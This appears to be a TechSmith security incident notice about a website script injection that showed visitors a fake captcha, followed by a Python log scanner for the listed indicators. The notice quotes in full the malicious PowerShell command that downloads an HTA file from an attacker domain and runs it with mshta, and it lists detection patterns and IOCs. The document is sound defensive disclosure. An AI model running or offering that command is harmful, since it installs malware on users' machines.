On 8 September 2025, between 10:26 AM and 12:14 PM EST, a third-party service used by TechSmith was altered to inject a malicious script into portions of our website, which is also loaded by some of TechSmith’s products and accessible through links in certain emails sent by TechSmith. The issue was detected and removed within two hours.
What You Need to Know
- Fewer than 3,000 visitors globally may have been exposed, but users in your organization may have visited the affected site and accessed the malicious content during that timeframe.
- The issue was quickly contained and the threat mitigated. We will continue monitoring for any related activity, and we are in close contact with the third-party vendor.
What Happened
- Visitors were redirected to https://amerlcansbarr[.]com, which displayed a fake captcha.
- The captcha instructed users to run the following PowerShell command: powershell -Command "iwr https://cptvrf[.]com -OutFile '%APPDATA%\mq.hta'"; Start-Process mshta.exe -FilePath '%APPDATA%\mq.hta'"
- This command attempted to install malware. In testing, we observed:
  - Creation of C:\Users\<username>\AppData\Roaming\TimeTracker\tracker.exe
  - The SHA256 hash of tracker.exe is: 2f3d0c15f1c90c5e004377293eaac02d441eb18b59a944b2f2b6201bb36f0d63
  - Persistence via a startup entry and scheduled task.
Recommended Actions
- Review endpoint protection logs for the indicators of compromise listed above.
- Ensure anti-malware solutions are current and scanning.
- Monitor for any unusual activity on potentially affected endpoints.
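One way to run the log review, as an added example that is not TechSmith's own tooling: a Python scan of exported proxy, process, and file logs for the domains, file paths, and hash listed above. The log layout, users, and sample lines are constructed for illustration; adapt the input to your own export format.

```python
import re

# Indicators from the advisory, stored defanged and refanged only in memory.
DOMAINS = ["amerlcansbarr[.]com", "cptvrf[.]com"]
SHA256 = "2f3d0c15f1c90c5e004377293eaac02d441eb18b59a944b2f2b6201bb36f0d63"
PATHS = [r"\AppData\Roaming\TimeTracker\tracker.exe", r"\mq.hta"]


def build_rules():
    """Return (label, regex) pairs; every rule is case-insensitive."""
    rules = []
    for d in DOMAINS:
        host = re.escape(d.replace("[.]", "."))
        # Subdomains match; look-alikes such as notcptvrf.com or
        # cptvrf.com.example.net do not.
        rx = r"(?<![a-z0-9-])" + host + r"(?!\.?[a-z0-9-])"
        rules.append(("domain " + d, re.compile(rx, re.I)))
    for p in PATHS:
        # Anchored on the right so a name like mq.hta.bak is not reported.
        rules.append(("path " + p, re.compile(re.escape(p) + r"(?![\w.])", re.I)))
    rules.append(("sha256 tracker.exe", re.compile(r"\b" + SHA256 + r"\b", re.I)))
    return rules


def scan(lines):
    """Return [(line_number, [labels])] for each line that hits an indicator."""
    rules = build_rules()
    hits = []
    for n, line in enumerate(lines, 1):
        labels = [label for label, rx in rules if rx.search(line)]
        if labels:
            hits.append((n, labels))
    return hits


# Constructed sample log lines (users and field layout are invented);
# written defanged here and refanged when the list is built.
SAMPLE = [line.replace("[.]", ".") for line in [
    r"2025-09-08 10:41:07 proxy user=alice GET https://www.techsmith.com/ 200",
    r"2025-09-08 10:41:09 proxy user=alice GET https://amerlcansbarr[.]com/ 200",
    r"2025-09-08 10:42:30 proc user=alice cmd=iwr https://CPTVRF[.]com -OutFile C:\Users\alice\AppData\Roaming\mq.hta",
    r"2025-09-08 10:42:41 file path=C:\Users\alice\AppData\Roaming\TimeTracker\tracker.exe sha256=2F3D0C15F1C90C5E004377293EAAC02D441EB18B59A944B2F2B6201BB36F0D63",
    r"2025-09-08 11:02:00 proxy user=bob GET https://notcptvrf[.]com.example[.]net/ 200",
    r"2025-09-08 11:05:12 file path=C:\Program Files\TimeTracker\tracker.exe sha256=<other-hash>",
]]

if __name__ == "__main__":
    for n, labels in scan(SAMPLE):
        print(n, labels)
```

Only lines 2 to 4 of the sample are reported; the look-alike domain and the tracker.exe under Program Files are not.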
We will provide updates if further information becomes available, and we have published an FAQ support article to answer common questions about this incident, accessible here: 8 September 2025 FAQ
We're very sorry for the concern this may cause and appreciate your prompt attention. At TechSmith, we will always err on the side of strength in security and do everything possible to proactively ensure our customers remain secure.
Thank you,
TechSmith Security Team